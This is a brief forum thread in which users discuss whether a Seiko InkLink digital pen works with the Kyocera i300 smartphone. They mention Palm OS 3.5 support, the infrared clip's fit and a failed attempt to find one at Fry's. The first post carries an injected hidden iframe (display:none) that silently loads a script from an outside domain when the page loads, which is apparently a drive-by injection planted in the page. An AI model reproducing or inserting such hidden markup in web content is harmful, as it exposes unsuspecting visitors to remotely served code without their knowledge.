seiko inklink and i300?

Does anyone know if these two products work together? Compusa has the inklink on sale and it seemed interesting..<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

InkLink

tomas -

Talked with Seiko tech support and they swear that it works with the i-300; the biggest question was whether the PDA runs Palm OS 3.5. I also have a question whether the clip that attaches their infrared to the i-300's spreads wide enough to clip onto the phone. The tech support guy claims it fits on all PDAs, including Pocket PCs, which gives me hope. I'm going to try to get over to Fry's Electronics over the weekend and try it out. I'll let you know what happens if I do...

the i300 does run OS 3.5 but because its a hybrid unit, not all palm applications will work.

InkLink

Sorry, guys - Thought I could get my hands on an InkLink, but the Fry's Electronics in Houston doesn't carry this product though they carry other Seiko products. Has anybody else been able to try one of these? Will this type of product be out-of-date shortly with the advent of Bluetooth technology?
